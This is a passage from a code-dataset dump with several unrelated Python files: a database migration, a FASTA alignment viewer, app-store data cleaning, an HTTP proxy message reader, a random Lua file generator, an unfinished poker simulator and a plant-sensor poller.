nullable=False),\n sa.Column('utc_created', sa.DateTime(), nullable=True),\n sa.Column('utc_updated', sa.DateTime(), nullable=True),\n sa.Column('name', sa.String(length=20), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('tags',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('utc_created', sa.DateTime(), nullable=True),\n sa.Column('utc_updated', sa.DateTime(), nullable=True),\n sa.Column('name', sa.String(length=20), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_tags_name'), 'tags', ['name'], unique=True)\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('utc_created', sa.DateTime(), nullable=True),\n sa.Column('utc_updated', sa.DateTime(), nullable=True),\n sa.Column('username', sa.String(length=32), nullable=False),\n sa.Column('email', sa.String(length=32), nullable=False),\n sa.Column('password_hash', sa.Binary(), nullable=False),\n sa.Column('is_enable', sa.Boolean(), nullable=True),\n sa.Column('role_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['role_id'], ['roles.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email'),\n sa.UniqueConstraint('username')\n )\n op.create_table('articles',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('utc_created', sa.DateTime(), nullable=True),\n sa.Column('utc_updated', sa.DateTime(), nullable=True),\n sa.Column('title', sa.String(length=64), nullable=True),\n sa.Column('body_text', sa.Text(), nullable=False),\n sa.Column('view_count', sa.Integer(), nullable=True),\n sa.Column('category_id', sa.Integer(), nullable=False),\n sa.Column('author_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),\n sa.ForeignKeyConstraint(['category_id'], ['categories.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_articles_title'), 'articles', ['title'], unique=False)\n op.create_table('article_tags',\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.Column('article_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['article_id'], ['articles.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], ),\n sa.PrimaryKeyConstraint('tag_id', 'article_id')\n )\n op.create_table('comments',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('utc_created', sa.DateTime(), nullable=True),\n sa.Column('utc_updated', sa.DateTime(), nullable=True),\n sa.Column('body_text', sa.String(length=200), nullable=False),\n sa.Column('is_enable', sa.Boolean(), nullable=True),\n sa.Column('author_id', sa.Integer(), nullable=True),\n sa.Column('article_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['article_id'], ['articles.id'], ),\n sa.ForeignKeyConstraint(['author_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('comments')\n op.drop_table('article_tags')\n op.drop_index(op.f('ix_articles_title'), table_name='articles')\n op.drop_table('articles')\n op.drop_table('users')\n op.drop_index(op.f('ix_tags_name'), table_name='tags')\n op.drop_table('tags')\n op.drop_table('roles')\n op.drop_index(op.f('ix_categories_name'), table_name='categories')\n op.drop_table('categories')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/eb1e026f5376_.py","file_name":"eb1e026f5376_.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"493577875","text":"#!/usr/bin/env python\n\n'''\n1. fasta alignment\n2. color bases? (y/n)\n3. mask matching bases? (y/n)\n'''\n\n\nfrom sys import argv, exit\nfrom Bio import SeqIO\nfrom os import system, popen\n\n\ntry:\n fname = argv[1]\n color = argv[2].upper()\n mask = argv[3].upper()\nexcept:\n exit(__doc__)\n\nf = open(fname, 'r')\nrecords = SeqIO.parse(f, 'fasta')\n\nref = []\ndic = {}\nmaxSeqNameLen = 0\ni = 0\nfor record in records:\n seqName = record.description\n seqShortName = record.id\n sequence = record.seq\n dic[seqName] = sequence\n if i == 0:\n ref = [seqShortName, sequence]\n if len(seqShortName) > maxSeqNameLen:\n maxSeqNameLen = len(seqShortName)\n\n if mask.upper() == 'Y':\n maskedSeq = ''\n for i in range(len(sequence)):\n base = sequence[i]\n if base.upper() == ref[1][i].upper() and not base == '-':\n base = '.'\n maskedSeq += base\n dic[seqName] = maskedSeq\n\n i += 1\nf.close()\n\n\n## display settings\n# set name width\nif maxSeqNameLen < 50:\n tagWidth = maxSeqNameLen\nelse:\n tagWidth = 50\nalnLen = len(ref[1])\n\n# automatic windown size\noutputH, outputW = popen('stty size', 'r').read().split()\nwindowSize = int(outputW) - tagWidth - 8\n\n\n# start drawing\nwindowStart = 0\nwhile windowStart < alnLen:\n windowEnd = windowStart + windowSize\n if windowEnd > alnLen:\n windowEnd = alnLen\n\n offset = windowEnd - windowStart - len(str(windowStart)) - len(str(windowEnd))\n print(\"%*s\\t%s\"%(tagWidth, \"Pos\", windowStart + 1) + ' '*offset + str(windowEnd))\n print(\"%*s\\t%s\"%(tagWidth, \"Ref\", ref[1][windowStart:windowEnd]))\n\n for seqName in dic:\n sequence = dic[seqName]\n frag = sequence[windowStart:windowEnd]\n coloredFrag = str(frag).upper()\\\n.replace('A','\\033[43mA\\033[0m')\\\n.replace('T','\\033[44mT\\033[0m')\\\n.replace('C','\\033[45mC\\033[0m')\\\n.replace('G','\\033[46mG\\033[0m')\n if color.upper() == 'Y' or color.upper() == 'YES':\n print(\"%*s\\t%s\"%(tagWidth, seqName[:tagWidth], coloredFrag))\n else:\n print(\"%*s\\t%s\"%(tagWidth, seqName[:tagWidth], frag))\n\n windowStart = windowEnd\n print(\"\\n\")\n","sub_path":"fastaProcessing/fastaAlnView.py","file_name":"fastaAlnView.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622207360","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # First Project - Dataquest.io\n# \n# **The project is about:**\n# App usage in the 'Google Play store' and the 'App Store'.\n# \n# **The project goal is:**\n# The goal is to help our developers understand what type of apps are likely to attract more users.\n\n# In[1]:\n\n\nfrom csv import reader\nopened_file = open('AppleStore.csv')\nread_file = reader(opened_file)\napple = list(read_file)\napple_header = apple[0]\napple_base = apple[1:]\n\nopened_file_b = open('googleplaystore.csv')\nread_file_b = reader(opened_file_b)\ngoogle = list(read_file_b)\ngoogle_header = [0]\ngoogle_base = google[1:]\n\n\n\n# ## Data exploration\n\n# In[2]:\n\n\ndef explore_data(dataset, start, end, rows_and_columns=False):\n dataset_slice = dataset[start:end] \n for row in dataset_slice:\n print(row)\n print('\\n') # adds a new (empty) line after each row\n\n if rows_and_columns:\n print('Number of rows:', len(dataset))\n print('Number of columns:', len(dataset[0]))\n\n\n# In[3]:\n\n\napple_expl = explore_data(apple, 0, 5)\n\n\n# In[4]:\n\n\ngoogle_expl = explore_data(google,0,5)\n\n\n# In[5]:\n\n\n# print the first rows of both data sets to identify the different variables\nprint(apple[0:1])\nprint('\\n')\nprint(google[0:1])\n\n\n# In[6]:\n\n\n# select what variables are suitable for analysis\n\n\n# # Data Cleaning\n\n# according to the discussion section of the google play data set, entry 10472 has a missing rating causing the columns to shift, lets check this out;\n\n# In[7]:\n\n\nprint(google[0])\nprint(google[10473])\n\n\n# The row is missing the data for the 'category' variable. The easiest solution is to just remove the record all together since we can't fill in the category ourselves with the usual methods such as average, mean etc.\n\n# In[8]:\n\n\ndel google[10473]\n\n\n# Let us now look into the applestore data.\n# \n# In the discussion forum of the Applestore data set, note is made about a extra column in the header row. Lets investigate this further\n\n# In[9]:\n\n\nprint(apple[0:2])\n\n\n# In[10]:\n\n\nprint(len(apple[0]))\nprint(len(apple[6]))\n\n\n# As we can clearly see based on the lengths of the header row and row 7, there is no difference in length. We checked this for several records and no difference was found so we can conclude that this issue, mentioned in the discussion, has already been resolved in the version of the dataset that we are using.\n\n# In[11]:\n\n\nduplicate_apps_google = []\nunique_apps_google = []\n\nfor i in google[1:]:\n name = i[0]\n if name in unique_apps_google:\n duplicate_apps_google.append(name)\n else:\n unique_apps_google.append(name)\nprint('Number of duplicate apps: ', len(duplicate_apps_google))\nprint('\\n')\nprint('Number of unique apps: ', len(unique_apps_google))\n\n\n# In[12]:\n\n\nduplicate_apps_apple = []\nunique_apps_apple = []\n\nfor j in apple[1:]:\n track = j[1]\n if track in unique_apps_apple:\n duplicate_apps_apple.append(track)\n else:\n unique_apps_apple.append(track)\nprint('Number of duplicate apps: ', len(duplicate_apps_apple))\nprint('\\n')\nprint('Number of unique apps: ', len(unique_apps_apple))\n\n\n# By looking at the result of the previous two code blocks we know that there are a lot of duplicates. When we try to perform analysis, these duplicates will influence our results so we should remove them. We could remove duplicates at random but there are probably some differences in rating, version or other variable. We should think of a criterion for removing the duplicates.\n\n# In[13]:\n\n\nprint(duplicate_apps_google[0:4])\n\n\n# In[14]:\n\n\nprint(duplicate_apps_apple)\n\n\n# In[15]:\n\n\ndef print_duplicate(datas,app_name):\n for app in datas:\n name = app[0]\n if name == app_name:\n print(app)\n \n\n\n# In[16]:\n\n\nPDF_scan = print_duplicate(google,'Quick PDF Scanner + OCR FREE')\n\n\n# Above check shows us that there are multiple, exact duplicates, in the google dataset. In order to remove these, we should first determine what criteria to use. In case there is a difference in last_version date or last update, this could show which record is most recent. Best practice would be to only take the most recent version into account\n\n# For the apple dataset we don't have any date's to use so we could look into\n# the amount of install to get an idea of what record we should retain and what \n# duplicates to remove\n\n# Below we will remove the duplicates from the 'google' dataset. We will go about his by creating a dictionary. Dictionaries, by definition, can only contain unique keys. In order to be able to hash a list of lists into a dictionary we need to prepare it first. This means taking out the attribute we will use as a key (the app name) and take out the information important, in our case the number of reviews. Because the record with the most reviews will give you the most information (more rating = more accurate)\n\n# In[17]:\n\n\nreviews_max = {} #create empty dictionary\nfor app in google[1:]:\n name = app[0] #name of the app\n n_reviews = float(app[3]) #number of reviews in float format\n # first check if name of app is already in our dictionary and if so \n # check if the number of reviews for the record in the dictionary\n # is greater than the number of ratings from the now read record\n if name in reviews_max and reviews_max[name] < n_reviews: \n reviews_max[name] = n_reviews\n elif name not in reviews_max:\n reviews_max[name] = n_reviews\n \nlen(reviews_max)\n \n \n\n\n# In[18]:\n\n\nreviews_max\n\n\n# In[19]:\n\n\ngoogle_clean = []\nalready_added = []\n\nfor app in google[1:]:\n name = app[0]\n n_reviews = float(app[3])\n if n_reviews == reviews_max[name] and name not in already_added:\n google_clean.append(app)\n already_added.append(name)\n \n \n\n\n# In[20]:\n\n\nlen(google_clean) #to check if we have the same number of records as previously \n\n\n# In[21]:\n\n\ngoogle_clean[0][0]\n\n\n# In[22]:\n\n\n# Mannequin Challenge', 'VR Roller Coaster'\nfor track in apple[1:]:\n if track[1] == 'Mannequin Challenge':\n print(track)\n print('\\n')\n elif track[1] == 'VR Roller Coaster':\n print(track)\n print('\\n')\n\n\n# In[23]:\n\n\n# apple total rating count = [5]\nratings_max = {} #create empty dictionary\nfor track in apple[1:]:\n name = track[1] #name of the app\n n_ratings = float(track[5]) #number of ratings in float format\n # first check if name of app is already in our dictionary and if so \n # check if the number of reviews for the record in the dictionary\n # is greater than the number of ratings from the now read record\n if name in ratings_max and ratings_max[name] < n_ratings: \n ratings_max[name] = n_ratings\n elif name not in ratings_max:\n ratings_max[name] = n_ratings\n \nlen(ratings_max)\n\n\n# In[24]:\n\n\napple_clean = []\nalready_in_apple = []\n\nfor track in apple[1:]:\n name = track[1]\n n_ratings = float(track[5])\n if n_ratings == ratings_max[name] and name not in already_in_apple:\n apple_clean.append(track)\n already_in_apple.append(name)\nprint(' the amount of records in the clean data set: ',len(apple_clean)) \nprint('\\n')\nprint(apple_clean[0:5])\n\n\n# We only want to focus on English apps. In order to identify the apps with names not belonging to the english language, we can use the ASCII code. The numbers corresponding to the characters we commonly use in an English text are all in the range 0 to 127, according to the ASCII (American Standard Code for Information Interchange) system. Based on this number range, we can build a function that detects whether a character belongs to the set of common English characters or not.\n\n# In[25]:\n\n\ndef english_check(string):\n count_weird = 0\n for a in string:\n if ord(a) > 127:\n count_weird += 1\n if count_weird > 3:\n return False\n return True\n \n\nTest2 = english_check('爱奇艺PPS -《欢乐颂2》电视剧热播')\nTest3 = english_check('Docs To Go™ Free Office Suite')\n\n\nprint(Test2)\nprint(Test3)\n\n\n\n# In[26]:\n\n\ngoogle_eng = []\n\n\nfor item in google_clean:\n x = english_check(item[0])\n if x == True:\n google_eng.append(item)\n \n\n\n# In[27]:\n\n\ngoogle_eng[0]\n\n\n# In[28]:\n\n\nprint(len(google_eng))\n\n\n# In[29]:\n\n\napple_eng = []\nfor item in apple_clean:\n x = english_check(item[1])\n if x == True:\n apple_eng.append(item)\n\n\n# In[30]:\n\n\napple_eng[0:2]\n\n\n# In[31]:\n\n\nfinal_apple = []\nfor i in apple_eng:\n if float(i[4]) == 0:\n final_apple.append(i)\n \n\n\n# In[32]:\n\n\nprint('The total amount of apps after cleaning:',len(apple_clean))\nprint('the amount of free apps: ', len(final_apple))\n\n\n# In[33]:\n\n\ngoogle_eng[1]\n\n\n# In[34]:\n\n\nfinal_google = []\nfor i in google_eng:\n if i[6] == 'Free':\n final_google.append(i)\n\n\n# In[35]:\n\n\nprint('The total amount of apps after cleaning:',len(google_eng))\nprint('the amount of free apps: ', len(final_google))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"App store comparison - cleaning done.py","file_name":"App store comparison - cleaning done.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"419245964","text":"\nimport re\n\nfrom proxy.logger import logger, logerror, logstate\n\nclass MessageReader(object):\n \"\"\"The base class for reading an HTTP message from a socket\"\"\"\n\n def message(self):\n return self._message\n \n def header(self):\n return self._header\n\n def ok(self):\n return self._ok\n\n def timeout(self):\n return self._timeout\n\n def tail(self):\n return self._tail\n\n def __init__(self, stream, pipeline_tail=b\"\"):\n self._message = pipeline_tail \n self._header = b\"\"\n self._ok = False\n self._timeout = False\n self._tail = b\"\"\n\n BUF_SIZE_SMALL = 50 \n BUF_SIZE = 4096\n first = True\n abort = False\n chunked = False\n while 1:\n logstate(\"readhdr\")\n try:\n chunk = stream.recv(BUF_SIZE_SMALL)\n except OSError as errv:\n self._ok = False\n self._timeout = not self._message\n logerror(\"Message read failed (1) %s \" % str(errv))\n logstate(str(errv))\n return\n except Exception:\n raise\n # empty chunk means client shutted down\n if None == chunk or 0 == len(chunk) :\n abort = True\n break\n # occasional blank lines in the begginning should be ignored\n if (first):\n chunk = chunk.lstrip(b\"\\r\\n\")\n chunk = chunk.lstrip(b\"\\n\")\n first = False\n self._message += chunk\n # empty line at the end means end of the _headers section. We only handle GET, without a body, so stop here\n match = re.search(b\"(\\r\\n\\r\\n|\\n\\n)\", self._message);\n if match:\n logstate(\"match\")\n break\n logstate(\"notmatch\")\n\n if abort or b\"HTTP\" not in self._message:\n self._ok = False\n self._timeout = not self._message\n return\n\n\n self._header = self._message[:match.start()]\n bodycount = len(self._message[match.end():])\n matchContent = re.search(b\"^content-length:\\s+(\\d+)\", self._header, re.IGNORECASE | re.MULTILINE)\n #value is not important: chunked coding should be always included and applied the last\n matchTransfer = re.search(b\"^transfer-encoding:\\s+\", self._header, re.IGNORECASE | re.MULTILINE)\n #if present, content-length is ignored\n if matchTransfer: \n chunked = True\n elif matchContent:\n chunked = False\n contentLength = int(matchContent.group(1))\n else:\n #_message without body\n self._ok = True\n self._tail = self._message[match.end():]\n return\n\n\n chunk = b\"\" \n try:\n if chunked:\n while 1: \n matchTransferEnd = re.search(b\"0\\r\\n(.*\\r\\n)?\\r\\n\", self._message[len(self._header):])\n if matchTransferEnd:\n self._ok = True\n break\n logstate(\"readbody ch\")\n chunk = stream.recv(BUF_SIZE)\n if not chunk:\n self._ok = False\n break\n self._message += chunk\n else:\n\n while 1:\n bodycount += len(chunk)\n if bodycount == contentLength:\n self._ok = True\n break\n logstate(\"readbody cl\")\n if contentLength - bodycount >= BUF_SIZE:\n chunk = stream.recv(BUF_SIZE)\n else:\n chunk = stream.recv(contentLength - bodycount)\n if not chunk:\n self._ok = False\n break\n self._message += chunk\n except OSError as value:\n logerror(\"Message read failed (2) \")\n logerror(str(value))\n self._ok = False\n self._timeout = not self._message\n \n @staticmethod \n def set_keep_alive(message, size, keep_alive):\n search_in = message[:size]\n matchConn = re.search(b\"^connection:\\s+.*$\", search_in, re.IGNORECASE | re.MULTILINE)\n if matchConn:\n return message[:matchConn.start()] + b\"connection: \" + (b\"keep-alive\" if keep_alive else b\"close\") + message[matchConn.end():]\n else:\n return message\n","sub_path":"proxy/message_reader.py","file_name":"message_reader.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504070798","text":"import string\nimport random\nimport os\nimport zipfile\n\ndef chuangjian(myaname):\n wenname = []\n k = 1\n while (k <= 10):\n def shouzimu(size=1, chars=string.ascii_uppercase):\n return ''.join(random.choice(chars) for _ in range(size))\n\n def wenjianname(size=random.randrange(4, 15), chars=string.ascii_uppercase):\n return ''.join(random.choice(chars) for _ in range(size))\n\n name = wenjianname()\n name = str(name)\n name = name.lower()\n tou = shouzimu()\n curPath = os.getcwd()\n targetPath = curPath + os.path.sep\n\n if not os.path.exists(targetPath):\n os.makedirs(targetPath)\n fileName = tou + name + myaname + '.lua'\n wenname.append(fileName)\n filePath = targetPath + os.path.sep + fileName\n\n with open(filePath, 'a') as f:\n for i in range(1, 800):\n def neirong(size=random.randrange(60, 90), chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n def bianliang(size=random.randrange(4, 15), chars=string.ascii_uppercase):\n return ''.join(random.choice(chars) for _ in range(size))\n\n nrong = neirong()\n name1 = bianliang()\n name2 = bianliang()\n name3 = bianliang()\n f.write('local' + ' ' + name1 + '=' + '\\'' + nrong + '\\'' + ';' + '\\n')\n if i % 8 == 0:\n f.write('function' + ' ' + name2 + '()' + 'end' + '\\n')\n if i % 5 == 0:\n f.write('print' + '(' + '\\'' + name3 + '\\'' + ')' + '\\n')\n k = k + 1\n wenjianname = 'jilu' + '.txt'\n wenjianpath = targetPath + os.path.sep + wenjianname\n with open(wenjianpath, 'a') as h:\n for _ in wenname:\n h.write(_ + ',')\n\ndef shanchu():\n curPath_s = os.getcwd()\n path111 = curPath_s + '\\\\' + 'jilu.txt'\n with open(path111, 'r') as m:\n list=m.read().split(',')\n l=0\n while(l<(len(list)-1)):\n shanwenjian=curPath_s+'\\\\'+list[l]\n os.remove(shanwenjian)\n l=l+1\n os.remove(path111)\n\ndef yasuo(name_yasuo):\n name = name_yasuo + '.zip'\n azip = zipfile.ZipFile(name, 'w')\n curPath_s = os.getcwd()\n for filesname in os.walk(curPath_s):\n for file in filesname[len(filesname) - 1]:\n list = file.split('.')\n if len(list) == 2 and list[1] == \"lua\":\n azip.write(file)\n azip.close()\n\n\n#3333333333\ntils = []\nstrttt = str(input('输入名字(多个名字用空格间隔,不输入则生成默认的文件):'))\nif len(strttt) == 0:\n tils = ['Service', 'Model', 'Entity', 'Command', 'Controller']\nelse:\n tils = strttt.split(' ')\n\nfor it in tils:\n chuangjian(it)\n yasuo(it)\n\nkey = int(input('输入1删除创建的文件并结束,输入其他不删除!请输入:'))\nif key == 1:\n shanchu()\nelse:\n print('over')","sub_path":"Try_try.py","file_name":"Try_try.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"556940891","text":"from observer import Observer\nfrom simpleAI import SimpleAI\nfrom gameinfo import GameInfo\nfrom gametable import Gametable\n\nfrom deuces import Card, Evaluator\nfrom deck import Deck\n\nclass RoundState():\n PREFLOP = 0\n FLOP = 1\n Turn = 2\n RIVER = 3\n\n\nclass Tournament(Gametable):\n \n BLIND_INCREMENTS = [[10,25],[25,50],[50,100],[75,150],[100,200],[150,300],[200,400],[300,600],[400,800],[500,10000],[600,1200],[800,1600],[1000,2000]]\n \n def __init__(self,quiet):\n \n self._quiet = quiet\n self.gameinfo = GameInfo()\n self.gameinfo._players = []\n self.gameinfo._seats = []\n self.gameinfo._max_seats = 3\n self.gameinfo._emptyseats = 0\n self.gameinfo._button = 0\n [ self.gameinfo._smallblind, self.gameinfo._bigblind] = Tournament.BLIND_INCREMENTS[0]\n\n self._bankroll=[]\n \n #hands and level\n self.gameinfo._num_of_hands=0\n self.gameinfo._level=0\n \n #small blind&big blind\n [self.gameinfo._smallblind,self.gameinfo._bigblind]=[0,0]\n \n #pots\n self.gameinfo._side_pots = [0] * self.gameinfo._max_seats\n self.gameinfo._totalpot=0\n \n #cards\n self._deck = None\n \n self.gameinfo._round=0\n self.gameinfo._board=[]\n self.gameinfo._hands=[]\n \n #\n self.gameinfo._tocall=0\n self.gameinfo._lastraise = 0\n \n\n\n def register_player(self, player):\n if not player in self.gameinfo._players:\n self.gameinfo._players.append(player)\n\n def unregister_player(self, player):\n if player in self.gameinfo._players:\n self.gameinfo._players.remove(player)\n\n def unregister_all(self):\n if self.gameinfo._players:\n del self.gameinfo._players[:]\n\n def notify_players(self, *args, **kwargs):\n for player in self.gameinfo._players:\n player.update(self.gameinfo)\n\n def process_players_action():\n for player in self.players:\n player.getAction()\n def new_round(self,players):\n for player in players:\n player.currentbet = 0\n player.playedthisround = False\n self.gameinfo._round += 1\n self.gameinfo._tocall = 0\n self.gameinfo._lastraise = 0\n\n def _first_to_act(self,players):\n try:\n first = [player for player in players if player.get_seat() > self.gameinfo._button][0]\n except IndexError:\n first = players[0]\n return first\n def post_smallblind(self,players):\n pass\n def post_bigblind(self,players):\n pass\n def _next(self, players, current_player):\n idx = players.index(current_player)\n return players[(idx+1) % len(players)]\n def deal(self,players):\n for player in players:\n if player.playing_hand:\n player.hand = self._deck.get_hands()\n if not self._quiet:\n print('Player:{} Get:{}'.format(player.playerID,self._deck.card_to_str(player.hand)))\n def flop(self):\n self.gameinfo._board = self._deck.get_flop()\n if not self._quiet:\n print('Flop:{}'.format(self._deck.card_to_str(self.gameinfo._board)))\n \n def turn(self):\n turn = self._deck.get_turn()\n self.gameinfo._board.extend(turn)\n \n if not self._quiet:\n print('Turn:{}'.format(self._deck.card_to_str(self.gameinfo._board)))\n def river(self):\n river = self._deck.get_river()\n self.gameinfo._board.extend(river)\n if not self._quiet:\n print('River:{}'.format(self._deck.card_to_str(self.gameinfo._board)))\n\n def player_bet(self, player, total_bet):\n pass\n \n def start_hand(self,players):\n \n players = [p for p in players if p.playing_hand]\n #assert sum([p.stack for p in players]) == 2000*len(self.gameinfo._seats)\n #shuffle deck\n self._deck = Deck()\n self.new_round(players)\n self.gameinfo._round=0\n \n self.notify_players()\n \n \n player = self._first_to_act(players)\n print([player.playerID for player in players])\n print('Small blind:{}'.format(player.playerID))\n self.post_smallblind(player)\n player = self._next(players, player)\n print('Big blind:{}'.format(player.playerID))\n self.post_bigblind(player)\n player = self._next(players, player)\n print('Btn:{}'.format(player.playerID))\n self.gameinfo._tocall = self.gameinfo._bigblind\n \n # rounds\n self.gameinfo._round = 0\n \n #Deal cards\n while self.gameinfo._round<4 and len(players)>1:\n if self.gameinfo._round==0 :\n self.deal(players)\n elif self.gameinfo._round == 1:\n self.flop()\n elif self.gameinfo._round == 2:\n self.turn()\n elif self.gameinfo._round ==3:\n self.river()\n \n self.gameinfo._folded_players = []\n \n while not player.playedthisround and len([p for p in players if not p.isallin]) >=1:\n if player.isallin:\n # print('player ', player.playerID, 'is all in, skipping their turn')\n player = self._next(players, player)\n continue\n \n action = player.get_action()\n player.playedthisround = True\n\n if action[0] == 'call':\n self.player_bet(player, self._tocall)\n if not self._quiet:\n print('Player', player.playerID, action)\n player = self._next(players, player)\n elif action[0] == 'check':\n self.player_bet(player, player.currentbet)\n if not self._quiet:\n print('Player', player.playerID, action)\n player = self._next(players, player)\n elif action[0] == 'bet':\n self.player_bet(player, action[1]+player.currentbet)\n if not self._quiet:\n print('Player', player.playerID, action)\n for p in players:\n if p != player:\n p.playedthisround = False\n player = self._next(players, player)\n elif action[0] == 'fold':\n player.playing_hand = False\n folded_player = player\n if not self._quiet:\n print('Player', player.playerID, action)\n player = self._next(players, player)\n players.remove(folded_player)\n self.gameinfo._folded_players.append(folded_player)\n # break if a single player left\n if len(players) ==1:\n break\n player = self._first_to_act(players)\n self.resolve_sidepots(players + folded_players)\n self.new_round()\n if not self._quiet:\n print('totalpot', self.gameinfo._totalpot)\n \n #assert sum([p.stack for p in self._seats]) + self._totalpot == 2000*len(self._seats)\n \n # print('requesting action from ',player.playerID)\n \n self.new_round(players)\n \n \n def increment_blinds(self):\n self.gameinfo._level = min(self.gameinfo._level+1,len(Tournament.BLIND_INCREMENTS)-1)\n [self.gameinfo._smallblind, self.gameinfo._bigblind] = Tournament.BLIND_INCREMENTS[self.gameinfo._level]\n \n def run_game(self):\n #First hand\n self.gameinfo._num_of_hands = 1\n self.gameinfo.level = 0\n #First level small blind & big blind\n [self.gameinfo._smallblind, self.gameinfo._bigblind] = Tournament.BLIND_INCREMENTS[self.gameinfo.level]\n \n #players' initial stack\n for player in self.gameinfo._players:\n player.stack = 2000\n player.playing_hand = True\n \n #seated players\n self.gameinfo._seats = self.gameinfo._players\n # keep playing until there's a single player (shotgun style)\n while( self.gameinfo._emptyseats < len(self.gameinfo._seats)-1 and self.gameinfo._num_of_hands<1000):\n #start a new hand\n self.start_hand(self.gameinfo._seats)\n s=raw_input('ss')\n #count of hands +1\n self.gameinfo._num_of_hands += 1\n #print log\n if not self._quiet:\n print('Starting game new hands: ', self.gameinfo._num_of_hands)\n print('level:{} SB:{} BB:{}'.format(self.gameinfo.level,self.gameinfo._smallblind,self.gameinfo._bigblind))\n for p in self.gameinfo._seats:\n if p.playing_hand:\n print('Player ',p.playerID, ' stack size: ', p.stack)\n \n # increment blinds every 15 hands (based on avg hands/hour of 30)\n if (self.gameinfo._num_of_hands % 15) == 0 and self.gameinfo._num_of_hands < 1000:\n self.gameinfo.level += 1\n self.increment_blinds()\n \n pass\n\n\n\nif __name__ == \"__main__\":\n tournament1 = Tournament(quiet=0)\n player1 = SimpleAI(playerID=\"LuYang\")\n player2 = SimpleAI(playerID=\"TianXiang\")\n player3 = SimpleAI(playerID=\"AI\")\n tournament1.register_player(player1)\n tournament1.register_player(player2)\n tournament1.register_player(player3)\n tournament1.run_game()\n#gametable.play()\n\n\n","sub_path":"game/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":9668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337679490","text":"#!/usr/bin/env python3\n\"\"\"Demo file showing how to use the miflora library.\"\"\"\n\nimport re\nimport requests\nfrom btlewrap import available_backends, BluepyBackend, GatttoolBackend, PygattBackend, base\n\nfrom miflora.miflora_poller import MiFloraPoller, \\\n MI_CONDUCTIVITY, MI_MOISTURE, MI_LIGHT, MI_TEMPERATURE, MI_BATTERY\n\nfrom config import *\nfrom influxdb import InfluxDBClient\nimport json\nimport os\n\ntry:\n db_client = InfluxDBClient(*influx_args)\nexcept ValueError:\n print(\"InfluxDBClient init failed. Check config!\")\nbackend = None\nclear_hosts = []\njson_filename = '.cached_data'\n# Check if data was cached and load it\ntry:\n with open(json_filename,'r') as json_file:\n json_body = json.load(json_file)\nexcept Exception as e:\n json_body = []\n\ndef valid_miflora_mac(mac, pat=re.compile(r\"C4:7C:8D:[0-9A-F]{2}:[0-9A-F]{2}:[0-9A-F]{2}\")):\n \"\"\"Check for valid mac adresses.\"\"\"\n if not pat.match(mac.upper()):\n raise TypeError('The MAC address \"{}\" seems to be in the wrong format'.format(mac))\n return mac\n\n\ndef poll(mac, hostname):\n \"\"\"Poll data from the sensor.\"\"\"\n global json_body\n global clear_history\n poller = MiFloraPoller(mac, backend)\n try:\n measurement = {\n \"measurement\": \"monitor_reading\",\n \"tags\": {\n \"monitor\": hostname\n },\n \"time\": int(poller._fetch_device_time()[1]),\n \"fields\": {\n \"firmware\": poller.firmware_version(),\n \"battery\": poller.parameter_value(MI_BATTERY),\n \"temperature\": poller.parameter_value(MI_TEMPERATURE),\n \"moisture\": poller.parameter_value(MI_MOISTURE),\n \"light\": poller.parameter_value(MI_LIGHT),\n \"conductivity\": poller.parameter_value(MI_CONDUCTIVITY)\n }\n }\n json_body.append(measurement)\n except Exception as e:\n print(str(e))\n\n\ndef history(mac, hostname):\n \"\"\"Read the history from the sensor.\"\"\"\n global json_body\n global clear_hosts\n temp = []\n poller = MiFloraPoller(mac, backend)\n history_list = poller.fetch_history()\n for entry in history_list:\n measurement = {\n \"measurement\": \"monitor_reading\",\n \"tags\": {\n \"monitor\": hostname\n },\n \"time\": int(entry.wall_time.timestamp()),\n \"fields\": {\n \"temperature\": entry.temperature,\n \"moisture\": entry.moisture,\n \"light\": entry.light,\n \"conductivity\": entry.conductivity\n }\n }\n temp.append(measurement)\n if len(history_list) == len(temp) and not len(history_list) == 0:\n for item in temp:\n json_body.append(item)\n clear_hosts.append(hostname)\n\n\ndef clear_history(mac):\n \"\"\"Clear the sensor history.\"\"\"\n poller = MiFloraPoller(mac, backend)\n poller.clear_history()\n\n\ndef _get_backend(config_backend):\n \"\"\"Extract the backend class from the command line arguments.\"\"\"\n if config_backend == 'gatttool':\n backend = GatttoolBackend\n elif config_backend == 'bluepy':\n backend = BluepyBackend\n elif config_backend == 'pygatt':\n backend = PygattBackend\n else:\n raise Exception('unknown backend: 